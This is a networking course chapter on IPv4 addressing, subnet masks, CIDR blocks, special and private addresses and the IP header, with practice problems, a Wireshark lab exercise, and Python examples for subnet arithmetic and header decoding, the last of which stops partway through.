[Figure: frame formats of the three networks. Token ring token and data frame formats, with the SD, AC, FC, Destination Address, Source Address, Information, FCS, ED and FS fields (Leon-Garcia & Widjaja, Communication Networks, Figure 6.61, copyright 2000 The McGraw Hill Companies); the 802.3 MAC frame (Figure 13.4); and the IBM SNA / HDLC / PPP frame format for bit-oriented protocols]

The answer is, of course: No. The frame formats on one network will be completely unrecognizable on a different network! For example, with Ethernet, the destination address occurs starting on the 9th byte into the frame. In token ring, the destination address starts with the 4th byte into the frame. In SNA, the destination address occurs on the 2nd byte into the frame. As another example, in Ethernet the data starts 23 bytes into the frame, in token ring the data starts either 7 or 15 bytes into the frame, and for SNA the data starts 3 bytes into the frame. A frame from one network will look like garbage on a different network.

Note that, aside from the frame format, different networks have "structural" differences also. For example, Ethernet has a maximum frame size of 1500 bytes, token ring has a maximum frame size of 5000 bytes and SNA has no maximum frame size. Consider also: Ethernet addresses are always 6 bytes. Token ring addresses can be 2 or 6 bytes, and SNA addresses are 1 byte. And, furthermore, we've shown only three networks connected above. Throw in an ATM network, a Token Bus network, some Novell and AppleTalk crap, an FDDI optical network and a couple of wireless LANs and things go to hell in a handbasket.

To summarize, then, we need protocols that can implement internetworking, i.e., we need protocols that can overcome the differences in networks. These protocols should "conceal" the underlying network differences so that users are unaware that different networks even exist. From the user's perspective, everyone should be on one monolithic network.

2. The Solution: The Kahn/Cerf Protocols

A revolutionary solution to the internetworking problem was proposed in the early 70's by Vinton Cerf and Robert Kahn. The two protocols they proposed, later christened the Internet Protocol (IP) and the Transmission Control Protocol (TCP), quickly became the most popular suite of protocols for internetworking and were subsequently adopted as the protocols used by the Internet.
[Photos: Vinton Cerf; Robert Kahn; Cerf and Kahn with President Bush]

If the award of the Presidential Medal of Freedom does not convince you of the importance of these protocols, perhaps this will: these protocols are so famous that one of the authors was once invited to give a talk on them to fascinated midshipmen.

These two protocols, IP and TCP, are truly a work of genius. They were intended to allow internetworking among a small number of small networks (in 1975 the Internet had a mere 61 nodes), and they have successfully scaled to support networks of billions of users. It is estimated that two billion videos are watched on YouTube each day. Trillions of emails are sent each year. Think about all the things you use the Internet for, and then consider that it all works because of protocols that were designed in 1975 for a small system and never intended to scale to large networks. Stated another way: it is amazing that the Internet actually works at all!

However, the fact that the Internet uses protocols originally designed for a small network of academics means that security was never baked into the cake. Security was not needed on a network of 61 nodes, all of whom were friends. With billions of nodes on the network today, things are different. Keep in mind throughout this chapter that IP itself does nothing to verify that a packet's source address is genuine, that its contents are unaltered in transit, or that nobody other than the intended receiver is reading it; those protections, where they exist at all, are layered on top of IP.

3. The Premises

Kahn and Cerf reasoned that for internetworking to be efficient, everyone must agree on three things:
(1) a standard for service;
(2) a global addressing scheme;
(3) a uniform packet format.

Regarding the first item, the standard for service: IP provides connectionless, unreliable, best-effort packet delivery.

Connectionless: Every packet is an independent entity, possibly traveling over a different path from source to destination. Stated another way, no connection is set up in advance along which all packets subsequently flow from source to destination.

Unreliable: Packets can be lost, delivered out of order, or delivered multiple times; IP will not detect this.
Best-effort: There are no guarantees that packet delivery will be successful. Basically, IP says: "I'll try, but no guarantees."

The standard of service provided by IP can be likened to the Post Office. To see this, suppose that you mail three letters to your family back in Los Angeles, California. Each letter is mailed from the same location in Bancroft Hall. You mail Letter #1 on Monday, Letter #2 on Tuesday and Letter #3 on Wednesday. It is quite possible that the letters follow different routes from Annapolis to Los Angeles. For instance, two of the letters might travel on a direct flight, while the third might be placed in a bag that has to change planes in Chicago. Letter delivery is connectionless. It is quite possible that your family receives the letters out of order, perhaps receiving Letter 3 before Letter 2. One of your letters might never be delivered; the Post Office estimates that slightly over 1% of mail is never delivered to its destination (for varying reasons). Letter delivery is unreliable. Unless you pay a premium, there are no guarantees that a letter you place in the mail will actually be delivered. Letter delivery is provided on a best-effort basis.

We now address the other two requirements for internetworking. The global addressing scheme is discussed in Section II below, and the uniform packet format in Section III.

II. The IP Address

1. A Software Address

To make a group of networks "appear" to be a single network, we must use a single global addressing scheme for all hosts on all networks. IP assigns each computer (strictly speaking, each network interface; a router has one address per interface) a unique 32-bit IP address. (This chapter covers IP version 4; IPv6 uses 128-bit addresses and is not discussed here.) This is a "software address"; it is not a hardware address. To send a packet over a TCP/IP network, we must use the destination's IP address. IP addresses have two parts: a Network ID, which is the same for all hosts on a particular network, and a Host ID, which is a unique suffix for each individual host on that network.
Network ID: same for all computers on a particular network.
Host ID: unique suffix for each individual computer on this particular network.

2. Dotted Decimal Notation for Reading IP Addresses

Let's momentarily gloss over the separation of the IP address into a Network ID and a Host ID, and simply focus on how the 32-bit address is represented. For historical reasons, IP addresses are expressed as decimal numbers (as opposed to a more sensible hexadecimal scheme). The 32-bit IP address is separated into four 8-bit chunks (octets). Each octet is then expressed as a decimal value, and the four values are separated by periods. This is termed the dotted-decimal notation for IP addresses.

For example, to express the IP address 10000001000010010100000111001111 in dotted-decimal notation, first split it into four octets:

10000001 00001001 01000001 11001111

then convert each octet individually to a decimal (base-10) number:

10000001 = 129
00001001 = 9
01000001 = 65
11001111 = 207

and write the four decimal numbers separated by periods: the IP address is 129.9.65.207.

Practice Problem 13.1 Express each of the following IP addresses in dotted-decimal notation. (a) 00001011 00000010 00000000 00100111 (b) 10000000 10000000 11111111 00000000 Solution: (a) (b)

Every computer on the Internet must have a unique IP address. That is, no two devices on the Internet can have the same IP address at the same time. In theory, since IP addresses are 32 bits, we have 2^32 (more than 4 billion) IP addresses available. Thus, in theory, more than 4 billion devices could be simultaneously connected to the Internet. (In practice the usable number is smaller: whole ranges are reserved for special purposes, as we will see in Sections 7 and 8, and the pool of unassigned IPv4 addresses has been exhausted, which is one reason the private addresses of Section 8 are so widely used.)

3. The Network Mask

Now, let's revisit the notion that the 32 bits in an IP address are divided into a Network ID and a Host ID. To view the Network ID portion of an IP address, we use a network mask. A network mask (which we will just call a mask, since the context is understood) is a 32-bit number consisting of a string of contiguous 1's followed by contiguous 0's.
Practice Problem 13.2 Which of the following can serve as masks? (a) 255.2.0.0 (b) 255.255.0.0 (c) 255.255.0.23 (d) 255.255.64.0 Solution: (a) (b) (c) (d)

Practice Problem 13.3 Show that the address 255.240.0.0 is a mask by writing it out as 32 bits. Solution:

Since masks always have the same form (a string of ones followed by a string of zeroes), they lend themselves to an easy shorthand notation. We can write a mask as /n, where n is the number of ones. This is called "slash notation" or CIDR notation. The acronym CIDR stands for Classless Inter-Domain Routing.[23]

Practice Problem 13.4 Write the following masks in slash notation. (a) 255.0.0.0 (b) 255.255.255.0 (c) 255.240.0.0 Solution: (a) (b) (c)

Practice Problem 13.5 Write the following masks in dotted decimal notation. (a) /16 (b) /9 Solution: (a) (b)

4. Use of Masks

Recall that IP addresses have two parts: Network ID followed by Host ID. We design masks so that if we bitwise AND the mask with an IP address, we extract the network ID. For example, suppose we are examining a Navy site that is using a mask of /17, and we see that a host on this network has the IP address 131.122.220.30. What is the network ID?

To solve this problem, we first express the mask as 32 bits:

11111111.11111111.10000000.00000000

We then express the IP address as a 32-bit quantity:

10000011.01111010.11011100.00011110

Recall the truth table for the bitwise AND operation: 0 AND 0 = 0, 0 AND 1 = 0, 1 AND 0 = 0, 1 AND 1 = 1. We then bitwise AND the mask with the IP address:

mask      11111111.11111111.10000000.00000000
IP addr   10000011.01111010.11011100.00011110
          -----------------------------------
net addr  10000011.01111010.10000000.00000000

[23] This is pronounced "cider", like "apple cider".
Now, converting the result to dotted-decimal notation, we have the network ID: 131.122.128.0

Recall the significance of this network address and the mask: since the mask was given as /17, every host on this network has the same first 17 bits. The network ID, 131.122.128.0, specifies the exact values of those first 17 bits. Thus, every host on this network has an IP address that begins:

10000011.01111010.1...

The remaining bits (shown as the three dots above) constitute the host ID.

Practice Problem 13.6 Suppose an organization has been given a mask /24. One of its machines has IP address 200.137.34.56. What is the network ID? Solution:

Practice Problem 13.7 Suppose an organization has been given a mask /13. One of its machines has IP address 200.137.34.56. What is the network ID? Solution:

5. Obtaining an IP Address

Each host on the Internet must have a unique IP address. It would be very bad for two (or more) hosts to have the same IP address; this (bad) event is termed an address conflict, and we must ensure there are no address conflicts. When an organization needs IP addresses, it is given a block of addresses. So how does an organization get a block of IP addresses to dole out to its hosts? To ensure there are no address conflicts (i.e., to ensure uniqueness), an organization called the Internet Assigned Numbers Authority (IANA) gives out network addresses. IANA has authorized five sub-organizations, termed Regional Internet Registries (RIRs), to control large blocks of addresses and distribute them to organizations in different geographic regions of the world. The RIR covering the United States and Canada is ARIN (the American Registry for Internet Numbers). Generally, ordinary organizations do not interact with ARIN directly. Usually, ISPs obtain large blocks of addresses from ARIN, and organizations in turn get blocks of addresses from their ISP.
So, the authority hierarchy is:

ICANN / IANA: ultimately controls all IP addresses
  5 Regional Internet Registries, authorized by IANA to administer blocks of addresses: ARIN, RIPE, APNIC, LACNIC, AFRINIC
    ISPs (ISP 1, ISP 2, ... ISP 16, ...)
      Organizations (Joe's Hardware, Sal's Pizza, USNA, ...)

Figure 2. Internet authority hierarchy (RIPE = Réseaux IP Européens)

So, bottom line: when an organization needs IP addresses, it is given a network address (usually from an ISP). The organization then uses the remaining bits in the IP address (the host bits) to distribute unique IP addresses to its hosts.

An Aside

Believe it or not, from the inception of the Internet until late 1998, a single individual manually assigned all IP addresses. That individual, Jon Postel, was termed by many the God of the Internet. He formed the Internet Assigned Numbers Authority (see the figure above) and served as its head until his death at age 55. He was the guiding force behind a number of Internet protocols. On the ten-year anniversary of his passing, Vint Cerf offered the toast: "Here's to Jonathan B. Postel, a man who went about his work diligently and humbly, who served all who wished to partake of the Internet and to contribute to it, and who did so asking nothing in return but the satisfaction of a job well done and a world open to new ideas."

6. IP Address Blocks

When an organization is given a network ID, it is given an IP address and a mask. For example, an organization might be given the block of IP addresses:

205.16.37.32/28

In this case, the first 28 bits determine the Network ID, and the final 4 bits are used for the Host ID. Thus, all hosts on this network will have the first 28 bits in common:

205.16.37.0010____

All hosts on this network will have the same first 28 bits, the Network ID. The organization can play with the last four bits to dole out unique IP addresses to all of its hosts.
So the organization can choose to make the host ID 0001, or 0101, or 1011, etc.; it uses the last four bits to assign unique IP addresses to all of its hosts. The organization has 2^4 = 16 different ways to assign these last four bits.

[Figure: the block 205.16.37.32/28. From Forouzan, Data Communications and Networking, 2007]

Any host on this network can have its address written in CIDR notation by following the address with the mask. For example, an individual host on the above network might have its IP address expressed as 205.16.37.39/28. More generally, a block of IP addresses is defined using the notation W.X.Y.Z/n, where W.X.Y.Z is any address in the block and /n defines the mask, i.e., the n leftmost bits are 1.

Practice Problem 13.8 You know that one of your organization's IP addresses is 205.16.37.39/28. (a) Describe the mask qualitatively. Solution: (b) What is the mask in binary? Solution: (c) What is the mask in dotted decimal notation? Solution: (d) Now, the mask bits with a 1 correspond to the network ID, and the mask bits with a 0 correspond to the bits that you can play with to assign IP addresses to your hosts. If that is the case, how many addresses have you been given? Solution:

Now we have to complicate matters further. First complication: the first address in a block is termed the network address, and is normally not assigned to a host. That is, the first address in your block, where the host bits all have the value zero, is used to identify your network to the rest of the world. So the answer to Practice Problem 13.8(d) must be revised: we have 16 addresses, but the first is our network address, which is not available to assign to a host. Second complication: the last address in a block is termed the broadcast address, and is normally not assigned to a host.
That is, the last address in your block, where the host bits all have the value one, is used to mean "all hosts on this network", and so it is not available to assign to a host. Bottom line: when you calculate the number of IP addresses you have to play with, you first determine the number of bits in the host-ID portion, and then use the formula:

Number of addresses available for assignment to hosts = 2^(number of bits in the host-ID portion) - 2

Practice Problem 13.9 You own a small organization that needs (and is given) 14 IP addresses for assignment to individual hosts. What is your mask in dotted decimal notation? Solution:

Practice Problem 13.10 As in the example above, you know that one of your organization's IP addresses is 205.16.37.39/28. What is the network address assigned to your organization? Solution: Last byte: MASK: Address: Result:

This is a major point of confusion for students. If I know that one of my machines has the IP address 205.16.37.39, how can I tell that the network address I own is 205.16.37.32? The answer: by using the mask, as we have shown.

Practice Problem 13.11 What is the network address of a network that has a host assigned the IP address 182.44.82.16/26? Solution:

Practice Problem 13.12 What is the network address of a network that has a host assigned the IP address 182.44.82.80/26? Solution:

So, as you can see, things can get very tricky here. If you knew a host had IP address 182.44.82.80, is it obvious that the host is on a network with network address 182.44.82.64? Here is an alternate way to find the network address (i.e., the first address in your block): if the IP address of a host is W.X.Y.Z/n, set the 32 - n rightmost bits to zero.
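The following Python script is an added worked example (it is not part of the original notes) that carries out every step of Sections 2 through 6 above on real input: binary and dotted-decimal conversion with validity checking, mask validity and /n conversion, the mask-AND that yields the network ID, and, given any W.X.Y.Z/n in a block, the network address, the broadcast address, the first and last assignable host addresses, and the usable-host count. It goes beyond the notes in two places, both marked in comments: it handles /31 and /32, where the 2^h - 2 formula does not apply, and it classifies the RFC 1918 private ranges that Section 8 lists. The function and variable names are the example's own.

```python
"""IPv4 address arithmetic for EC310 Chapter 13 (added example, not the notes' own code)."""
ALL_ONES = 0xFFFFFFFF

# RFC 1918 private blocks in CIDR form (Section 8 lists them as ranges).
PRIVATE_BLOCKS = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")


def parse_dotted(text: str) -> int:
    """Convert 'W.X.Y.Z' to a 32-bit integer, rejecting malformed addresses."""
    octets = text.strip().split(".")
    if len(octets) != 4:
        raise ValueError(f"{text!r}: an IPv4 address has exactly four octets")
    value = 0
    for octet in octets:
        if not octet.isdigit() or int(octet) > 255:
            raise ValueError(f"{text!r}: octet {octet!r} is not in 0..255")
        value = (value << 8) | int(octet)
    return value


def to_dotted(value: int) -> str:
    """Convert a 32-bit integer to dotted-decimal notation."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_valid_address(text: str) -> bool:
    try:
        parse_dotted(text)
        return True
    except ValueError:
        return False


def prefix_to_mask(n: int) -> int:
    """/n -> mask: n leading ones followed by 32-n zeros."""
    if not 0 <= n <= 32:
        raise ValueError(f"/{n}: prefix length must be 0..32")
    return (ALL_ONES << (32 - n)) & ALL_ONES


def mask_to_prefix(mask: int) -> int:
    """mask -> n. Valid only if the ones are contiguous and leftmost."""
    n = bin(mask).count("1")
    if prefix_to_mask(n) != mask:
        raise ValueError(f"{to_dotted(mask)} is not a mask: its ones are not contiguous")
    return n


def is_valid_mask(text: str) -> bool:
    """Accepts either '/n' or dotted-decimal form."""
    try:
        if text.startswith("/"):
            prefix_to_mask(int(text[1:]))
        else:
            mask_to_prefix(parse_dotted(text))
        return True
    except ValueError:
        return False


def describe_block(cidr: str) -> dict:
    """Given any address W.X.Y.Z/n in a block, return the block's key facts."""
    addr_text, prefix_text = cidr.replace(" ", "").split("/")
    addr, n = parse_dotted(addr_text), int(prefix_text)
    mask = prefix_to_mask(n)
    network = addr & mask                      # host bits cleared: network address
    broadcast = network | (~mask & ALL_ONES)   # host bits set: broadcast address
    host_bits = 32 - n
    total = 1 << host_bits
    if host_bits >= 2:
        # The notes' rule: first and last addresses are reserved, so 2^h - 2 hosts.
        usable, first, last = total - 2, network + 1, broadcast - 1
    else:
        # Beyond the notes: /31 point-to-point links (RFC 3021) use both
        # addresses and /32 names a single host; nothing is reserved.
        usable, first, last = total, network, broadcast
    return {"mask": to_dotted(mask), "prefix": n,
            "network": to_dotted(network), "broadcast": to_dotted(broadcast),
            "total_addresses": total, "usable_hosts": usable,
            "first_host": to_dotted(first), "last_host": to_dotted(last)}


def prefix_for_hosts(needed: int) -> int:
    """Smallest block (largest /n) with at least `needed` assignable host addresses."""
    for host_bits in range(2, 33):
        if (1 << host_bits) - 2 >= needed:
            return 32 - host_bits
    raise ValueError("no IPv4 block is that large")


def in_block(address: str, cidr: str) -> bool:
    """True if the address shares the block's network ID (same n leading bits)."""
    net_text, prefix_text = cidr.split("/")
    mask = prefix_to_mask(int(prefix_text))
    return parse_dotted(address) & mask == parse_dotted(net_text) & mask


def is_private(address: str) -> bool:
    """RFC 1918 address: usable inside a site, never forwarded across the Internet."""
    return any(in_block(address, block) for block in PRIVATE_BLOCKS)


if __name__ == "__main__":
    for cidr in ("131.122.220.30/17", "205.16.37.39/28", "180.34.64.65/30"):
        print(cidr, describe_block(cidr))
    print("172.18.3.1 private?", is_private("172.18.3.1"))
```

Running the script reproduces the worked /17 example (network 131.122.128.0) and the /28 block (205.16.37.32 through 205.16.37.47, 14 assignable hosts). The validity checks matter in practice: a mask such as 255.255.64.0 is rejected because a non-contiguous mask would silently produce a nonsensical network ID, and an address with a fifth octet or an octet above 255 is rejected before any arithmetic is done.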
Practice Problem 13.13 Using the technique above, determine the network address of a network that has a host assigned the IP address 182.44.82.16/26. Solution:

Practice Problem 13.14 Using the technique above, determine the network address of a network that has a host assigned the IP address 182.44.82.80/26. Solution:

Practice Problem 13.15 Suppose one of your machines has the IP address 180.34.64.65/30. (a) How many addresses do you have available for assignment to hosts? (b) What is your network address? Solution: (a) (b)

So much for the first address in your block. How do you find the last address (i.e., the broadcast address) in your block? Here is a way: if the IP address of a host is W.X.Y.Z/n, set the 32 - n rightmost bits to one.

Practice Problem 13.16 Suppose you know that one of your organization's IP addresses is 205.16.37.39/28. What is the last address (the broadcast address) in the block assigned to your organization? Solution:

Summary of what you need to know: given a host with address W.X.Y.Z/n, determine the number of addresses in your block, as well as the first address (the network address) and the last address (the broadcast address).

7. Special IP Addresses

We already mentioned that an IP address whose network ID bits are set to the proper value but whose host bits are all zero refers to the network itself. Similarly, an IP address whose network ID bits are set to the proper value but whose host bits are all one is the broadcast address for that network. Here are more special IP addresses.

The all-zeroes address (32 zeroes) means "me". It is used as a source address by a host that does not yet know its own IP address.

The all-ones address (32 ones) means "all hosts on this network". It is the limited broadcast address: routers never forward it beyond the local network. Why would this ever be used? A host may not know its own IP address (and hence does not know its network ID).
A host that has just started up and doesn't know who or where it is uses the all-zeroes address to refer to itself and the all-ones address to refer to "anyone else out there". (This is exactly how a host asks a DHCP server for an address; see Problem 3(e) at the end of the chapter.)

The reserved block 127.0.0.0/8 is used for "loopback"; 127.0.0.1 is the address normally used. These addresses are used for testing on the local computer. When a loopback address is used as a destination address, the computer does not send the packet onto the network at all; it is delivered back to the same machine.

8. Private IP Addresses

IANA has reserved the following IP address ranges for private use (RFC 1918):

10.0.0.0 to 10.255.255.255 (10.0.0.0/8)
172.16.0.0 to 172.31.255.255 (172.16.0.0/12)
192.168.0.0 to 192.168.255.255 (192.168.0.0/16)

You are allowed to use any of these addresses at will without permission from anyone. Note that this equates to almost 18 million addresses (almost half of 1% of the potential IP addresses). Private IP addresses cannot be used on the Internet: Internet routers will not forward packets addressed to them. (A site that uses private addresses internally reaches the Internet through a device at its border that rewrites them to a public address, i.e., network address translation.) These addresses must be unique within a private network, but do not need to be unique globally.

Practice Problem 13.17 (a) Can more than one organization assign the number 172.18.3.1 to one of its machines? (b) If no, why not? If yes, does this violate the cardinal rule: no two machines on the Internet can have the same IP address at the same time? (c) What happens if I try to launch a packet with the destination address 172.18.3.1 onto the Internet? Solution: (a) (b) (c)

III. The Uniform Packet Format

We mentioned that IP was developed with the idea that to internetwork efficiently, we must have an agreed-upon packet format. The Internet Protocol defines a hardware-independent packet format. The IP packet (also called a datagram) has the basic structure: Header, followed by Data. The size of the header can vary from 20 to 60 bytes. The maximum allowed total size of an IP packet (header + data) is 65,535 bytes (just under 64 KB). [Figure 20.5: IPv4 datagram format]
The IP packet format (header fields): Forouzan, Data Communications and Networking, McGraw Hill, 2007.

We offer a brief explanation of the various fields:

Version: the IP version number; for every packet in this chapter, 4.

HLEN: length of the header in 4-byte units. Minimum 5 (a 20-byte header), maximum 15 (60 bytes). (In practice the vast majority of IP packets contain no options and thus have the minimum header length of 5.) A receiver should check this field before trusting anything after byte 20: a value below 5, or a header length greater than the number of bytes actually received, means a malformed packet.

Type of service: not used much in practice (today the field carries DiffServ and ECN bits). We'll ignore it.

Total length: total number of bytes in the packet (header plus data). Maximum 65,535.

Identification, flags and fragmentation offset: these fields will not be covered in this class.

Time to live: this eight-bit field serves as a hop counter. The originating source of the IP packet places a number in this field (since the field is eight bits, the maximum number is 255). Each router that handles the packet decrements the value by one; when the hop counter reaches zero, the router discards the packet. The purpose of this field is to prevent a packet from wandering around the Internet aimlessly forever.

Protocol: what is carried in the data portion: TCP (6), UDP (17), ICMP (1) or something else.

Header checksum: a checksum of the header only, not of the data. Because the time-to-live value changes at every hop, every router must recompute it. Note what this field does and does not do: it detects accidental corruption of the header in transit, but it offers no protection against deliberate modification, since anyone who alters a header simply recomputes the checksum.

Addresses: if you don't know what these are, you've been asleep for the past hour!

Options: these will not be covered in this class.

Problems

1. Suppose you transfer a computer from the ECE Department at USNA to the EECS Department at USMA. Will its MAC address need to be changed? Will its IP address need to be changed?

2. (a) What is the network address of 10.64.128.200/28? (b) How many IP addresses are there in the block of IP addresses assigned to this network? (c) What is the first available IP address that can be assigned to a host? (d) What is the last available IP address that can be assigned to a host? (e) What is the broadcast address for this network? (f) Can the IP addresses assigned to this network be routed across the Internet? Justify your answer.

3. (a) Assume an IP packet traverses multiple routers on its way from source to destination. Which IP packet header fields change from router to router? (b) You receive an IP datagram containing 1024 bytes (assume no options). What is the value of the HLEN and TOTAL LENGTH fields? (c) What is the purpose of the Time-to-Live field in the IP packet header? (d) If an IP packet header is 32 bytes total, what value should the HLEN field contain for this packet? (e) A host has just been powered on and wishes to receive an IP address from the DHCP server. How can it send a request over a TCP/IP network if it does not have an IP address and does not know the address of the DHCP server? (f) If the Time To Live (TTL) field in the header of an IP packet has the value 00000001, what will happen to this packet when it travels to the next hop?

4. (a) Write the following masks in slash notation. (i) 255.255.255.0 (ii) 255.240.0.0 (b) Write the following masks in dotted decimal notation. (i) /16 (ii) /9

5. The purpose of the header checksum field in an IP header is to (choose the correct answer): (a) Provide for error checking between source and destination (b) Check that the headers from previous layers have been filled out correctly (c) Add up the bytes in the message and make sure it can fit in one packet (d) This field is no longer used for IP communications

6. As a network administrator you notice something fishy going on in your network. In order to diagnose the problem you start sniffing packets using Wireshark and find an IP packet with the following header (shown here in hexadecimal).

45 00 00 34 60 ad 40 00 3f 06 03 5d 83 78 a8 1f 83 78 28 aa

(a) What version of IP is this packet using? (b) What is the source address?

7. Consider the IP address 136.52.100.34/19. (a) What is this address's network mask (in dotted decimal)? (b) What is this address's network address? (c) What is this network's broadcast address?
(d) How many hosts can this network accommodate?

8. In a brief sentence, explain what is meant by the Internet Protocol principle "connectionless".

9. True or False: An IP address is normally expressed in hexadecimal.

10. Write the network address for IP address 146.25.129.17/20 in dotted decimal format.

11. The purpose of the time to live field in an IP header is to (choose the correct answer): (a) Show the number of hops to the destination (b) Prevent a packet from endlessly traversing the internet (c) Translate a packet to classless routing (CIDR) (d) Amplify the network mask

12. Which one of the following is NOT a principle behind the design of the Internet Protocol? (a) user-defined (b) best-effort (c) unreliable

13. Fill in the blanks: An IP address is ____ bits long. When expressed in dotted decimal form, every ____ bits form an octet. The integer value of a single octet can range from ____ to ____.

14. In one sentence, state the purpose of a network mask.

15. Assume you are provided the IP address 128.32.14.2 and a network mask of 255.255.254.0. (a) What is your network ID expressed in dotted decimal notation? (b) Continuing from part (a), state the number of bits that can be used to assign host IP addresses. (c) Continuing from part (b), determine how many valid host IP addresses you can assign on your network. (d) Assume that host IP addresses are assigned sequentially from lowest to highest on your network. What is the last valid IP address that can be assigned to a host on your network, expressed in dotted decimal form?

16. Circle the best word, or fill in the blanks, to complete the statements below that pertain to IPv4 addresses. An IP address is a software / hardware address which is made up of 16 / 512 / 32 bits. An IP address consists of two parts, a ____________________ ID and a ____________________ ID. If all of the ____________________ ID bits of an IP address are zero, then the address is the network / broadcast address. If all of the ____________________ ID bits of an IP address are one, then the address is the network / broadcast address.

17. Show all work: (a) What is the network address of 156.143.10.55/21? (b) How many hosts can be assigned a unique IP address on this network? (c) What is the first available IP address that can be assigned to a host? (d) What is the last available IP address that can be assigned to a host?

18. Can private IPv4 addresses be routed across the Internet? If not, what is the purpose of private IP addresses? If so, explain how they can be routed across the Internet.

19. Answer True or False to each of the following statements: (a) An IP address is a software address. (b) IP addresses are used at the network layer. (c) There are 6 bytes in an IP address. (d) Once set, the IP address of a computer never changes.

20. Select from the following those that are valid IPv4 network masks. (There may be more than one correct answer.) (a) /45 (b) 255.255.128.0 (c) 128.255.255.0 (d) 255.255.240.0 (e) /16

21. You are a network administrator and are given the following block of addresses by your ISP: 137.18.129.128/27. (a) How many hosts can you support on this network? (b) What is the first possible host ID? (c) What is the last possible host ID? (d) What is the broadcast address for your network?

22. Suppose you know the first address and last address in a block of IPv4 addresses (i.e., you know the network address and the broadcast address). Explain how you can determine the total number of IPv4 addresses in the block.

23. Express the following IP address in dotted-decimal notation: 01010101 . 10000101 . 00110011 . 00011111

24. Suppose you are given a block of IPv4 addresses with a prefix length of 14, i.e., there are 14 bits in the network-ID portion of your addresses. How many addresses are in your block?

25. Express the mask /14 in dotted decimal notation.

26. Express the mask 255.240.0.0 in slash notation.

27. You wake up one morning, stagger over to your computer and exclaim: "Wow, one of the IP addresses in my block happens to be 140.150.16.17/18!" Overcome with excitement, you set out to determine the first and last addresses in your block that can be assigned to hosts. What do you come up with?

28. Consider the Time-to-live field in the IP packet header. (a) Can the value stored in this field be equal to the decimal value of zero? Explain. (b) Can the value stored in this field be equal to the decimal value of twenty? Explain. (c) Can the value stored in this field be equal to the decimal value of three hundred? Explain.

29. Using Wireshark, you examine the header of an IP packet, which starts out as: 45 00 00 4E 00 10 00 00 12 06 23 c5 etc., etc. (a) How many bytes are in this IP packet's header? (b) How many bytes are there in the data portion of this IP packet? (c) How many more routers can this packet travel to before it is thrown away by a router?

30. Suppose an IP packet's header has no options. Which fields of the header can change as the packet travels from router to router? (Ignore the flag field and the fragmentation offset field.)

Security Exercise 13

Part I: Your IP Address

You learned today that all computers connected to the Internet have a second address in addition to the physical address: the IP address. We need IP addresses to communicate over the Internet. In fact, every computer on the Internet needs a unique IP address (in addition to its unique MAC address). So, let's begin by finding out our IP address. From the Windows command prompt, type:

ipconfig /all

Question 1. What is your IP address for your wireless LAN?

So we have an Ethernet address and an IP address. So, what again is an IP address? We mentioned that in order to make a number of dissimilar networks "appear" to be one single happy network, we must use a single global addressing scheme for all hosts on all networks.
That's where the Internet Protocol (IP) comes in. IP assigns each computer a unique 32-bit IP address. This IP address is a "software address"; it is not a hardware address. To send a packet over the Internet, we must use the destination's IP address, not the physical address. This point bears repeating: your IP address exists in software only. Your computer's IP address is in no way "burned in" to the hardware, as your hardware address is. Tomorrow your computer might have a different IP address, but it will have the same physical address.

To make IP addresses easy to read, they are expressed in dotted-decimal notation: each 8 bits of the 32-bit address is expressed as a decimal value, and the four values are separated by periods. Let's review by answering a few questions.

Question 2. State whether the following IP addresses are valid or not; for those that are invalid, state the reason. (a) 129.11.11.239 (b) 221.34.8.9.20 (c) 193.131.28.253 (d) 78.45.300.15

Part II: Packet Analysis

Start up VMware Workstation and power on your Cyber2 VM. Then launch Wireshark by selecting: Applications > Internet > Wireshark (as root). Under File, click Open, highlight the file named packets, and then hit Open.

Recall that the top pane is the Packet List pane. Starting at the left, we have the number (No.) column (each captured packet is sequentially numbered by Wireshark), followed by the Time column (which indicates the relative time at which each packet was received, with the first packet arriving at t = 0). The next two columns indicate the source and destination IP addresses for the packet.

Question 3. What is the IP address of the computer that generated the 21st packet?

The next column indicates which protocol is used in the packet. We have not discussed all of these in class yet, but some of them may ring a bell from SI110.
The last column provides some additional information about the packet. Let's look at packet 5182.

Question 4. How many seconds into the packet capture was this packet sent?

Question 5. What is the IP address of the sender of this packet?

Question 6. What is the IP address of the receiver of this packet?

Hmm... so we can see who is talking to whom. (Details about a communication that do not reveal its contents are termed metadata.)

Now, let's look at the Packet Details pane for this packet. It shows the protocols used by this packet: we see that this packet used Ethernet, the Internet Protocol (IP) and the Transmission Control Protocol (TCP). By clicking on the arrow sign we can expand and collapse each of the listed protocols. The bottom pane, the Packet Bytes pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.

Question 7. How many bytes of data are in this frame?

Now, let's look at the Internet Protocol in more detail. Click the arrow sign next to Internet Protocol and you should see the IP header fields expanded.

Question 8. What version of the Internet Protocol (IP) is being used?

Question 9. IP uses a checksum for error detection. Did this packet pass the checksum?

The IP packet consists of a header followed by data. The format of the header alone is shown in the figure (Forouzan, Data Communications and Networking, 4th ed., 2007).

Let's find the start of the IP packet. Highlight the line that says Version 4 and the corresponding hex should be highlighted in the bottom window. Starting at this location, the packet is:

45 00 01 57 36 e3 40 00 3f 06 2c 04 83 78 a8 1f 83 78 28 aa 04 d9 0c 3b a9 5b 18 98 59 96 ad 43 50 18 f5 3c 5c 6f 00 00 17 03 01 00 60 6d f0 04 92 b6 d7 66 cd 9e d5 4c b8 17 f5 25 26 06 b5 eb b8 3e c7 92 37 d3 28 36 78 8c 1e 7f 83 4f 6d 8a 24 7e 90 7d 88 ef 3d b4 ff e2 17 b7 42 67 6a 34 0b 43 43 9d 49 8e 48 2f 1b 91 fa 05 bf a5 8a 61 63 4c

Question 10. What is the meaning of the first hexadecimal digit (4)?
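The following Python script is an added worked example; it is not part of the original exercise and it is not Wireshark's code. It decodes the first 20 bytes of the packet printed above field by field, exactly as Section III describes the header, verifies the header checksum the way a receiver does (Question 9), and then performs the per-hop processing Section III attributes to each router: decrement the time-to-live, discard the packet if it reaches zero, and recompute the checksum. The same parser runs unchanged on the header in Problem 6 of the chapter problems. The only assumption is that the bytes above are an IPv4 header; the protocol-name table and the sanity checks on HLEN and total length are the example's own additions.

```python
"""Decode an IPv4 header and do a router's per-hop work (added example for EC310)."""
import struct
from dataclasses import dataclass
from typing import Optional

# First 20 bytes of packet 5182 as printed in Security Exercise 13, Part II.
EXERCISE_HEADER_HEX = "45 00 01 57 36 e3 40 00 3f 06 2c 04 83 78 a8 1f 83 78 28 aa"

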